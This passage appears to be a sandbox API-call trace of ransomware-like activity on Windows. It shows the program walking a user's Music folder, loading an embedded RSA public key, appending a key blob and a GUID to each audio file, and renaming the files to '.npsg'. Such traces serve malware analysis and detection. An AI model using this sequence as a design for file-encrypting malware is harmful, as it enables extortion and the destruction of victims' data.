hHeap=0x620000) returned 1 [0238.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0238.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.041] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\") returned="ZmlmXoAngk\\" [0238.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c5148 [0238.041] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0238.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409878 [0238.041] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0238.041] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.041] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.041] PathFindFileNameW (pszPath="") returned="" [0238.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.041] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe28078d0, ftCreationTime.dwHighDateTime=0x1d5bbb6, ftLastAccessTime.dwLowDateTime=0xb4184e80, ftLastAccessTime.dwHighDateTime=0x1d5bdc0, ftLastWriteTime.dwLowDateTime=0xb4184e80, ftLastWriteTime.dwHighDateTime=0x1d5bdc0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0238.043] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe28078d0, ftCreationTime.dwHighDateTime=0x1d5bbb6, ftLastAccessTime.dwLowDateTime=0xb4184e80, ftLastAccessTime.dwHighDateTime=0x1d5bdc0, ftLastWriteTime.dwLowDateTime=0xb4184e80, ftLastWriteTime.dwHighDateTime=0x1d5bdc0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.043] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28745c0, ftCreationTime.dwHighDateTime=0x1d5c01a, ftLastAccessTime.dwLowDateTime=0x4f116840, ftLastAccessTime.dwHighDateTime=0x1d5b6be, ftLastWriteTime.dwLowDateTime=0x4f116840, ftLastWriteTime.dwHighDateTime=0x1d5b6be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="--nHV1eb", cAlternateFileName="")) returned 1 [0238.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70e008 [0238.043] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bd55c10, ftCreationTime.dwHighDateTime=0x1d5c492, ftLastAccessTime.dwLowDateTime=0xc29c7520, ftLastAccessTime.dwHighDateTime=0x1d5b75e, ftLastWriteTime.dwLowDateTime=0xc29c7520, ftLastWriteTime.dwHighDateTime=0x1d5b75e, nFileSizeHigh=0x0, nFileSizeLow=0xdc17, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c12gAGx_DbiDVGgC47j.wav", cAlternateFileName="C12GAG~1.WAV")) returned 1 [0238.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0238.043] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\c12gAGx_DbiDVGgC47j.wav") returned=".wav" [0238.043] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\c12gAGx_DbiDVGgC47j.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\c12gagx_dbidvggc47j.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.045] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=56343) returned 1 [0238.045] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.048] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xdbf1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.048] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.050] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xdc17, lpOverlapped=0x0) returned 1 [0238.051] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.051] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.051] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.051] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.053] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.053] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.053] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.053] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.053] GetLastError () returned 0x0 [0238.053] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.053] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.053] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.053] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.053] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.054] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.054] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xdc17, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.054] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.055] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.055] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.055] CloseHandle (hObject=0x644) returned 1 [0238.057] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\c12gAGx_DbiDVGgC47j.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\c12gagx_dbidvggc47j.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\c12gAGx_DbiDVGgC47j.wav.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\c12gagx_dbidvggc47j.wav.npsg")) returned 1 [0238.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0238.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.058] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0238.059] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc57eda0, ftCreationTime.dwHighDateTime=0x1d5c11d, ftLastAccessTime.dwLowDateTime=0x2e6254a0, ftLastAccessTime.dwHighDateTime=0x1d5c015, ftLastWriteTime.dwLowDateTime=0x2e6254a0, ftLastWriteTime.dwHighDateTime=0x1d5c015, nFileSizeHigh=0x0, nFileSizeLow=0x918a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DjK6Z9TVms11M9cA8w.m4a", cAlternateFileName="DJK6Z9~1.M4A")) returned 1 [0238.059] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\DjK6Z9TVms11M9cA8w.m4a") returned=".m4a" [0238.059] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\DjK6Z9TVms11M9cA8w.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\djk6z9tvms11m9ca8w.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.061] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=37258) returned 1 [0238.061] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.064] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x9164, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.064] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.066] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x918a, lpOverlapped=0x0) returned 1 [0238.067] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.067] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.067] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.067] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.068] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.068] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.068] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.068] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.069] GetLastError () returned 0x0 [0238.069] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.069] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.069] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.069] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.069] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9190) returned 0x3b83cd0 [0238.069] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x34098c0 [0238.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400848 [0238.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409908 [0238.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400860 [0238.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400890 [0238.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008f0 [0238.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008a8 [0238.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0238.070] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400890 | out: hHeap=0x620000) returned 1 [0238.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008a8 | out: hHeap=0x620000) returned 1 [0238.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008f0 | out: hHeap=0x620000) returned 1 [0238.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008f0 [0238.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0238.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34008a8 [0238.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0238.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400890 [0238.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0238.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0238.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0238.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0238.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008a8 | out: hHeap=0x620000) returned 1 [0238.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400890 | out: hHeap=0x620000) returned 1 [0238.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008f0 | out: hHeap=0x620000) returned 1 [0238.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.071] GetCurrentThreadId () returned 0x5b4 [0238.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b831b8 [0238.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.072] GetCurrentThreadId () returned 0x5b4 [0238.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.072] HeapFree (in: 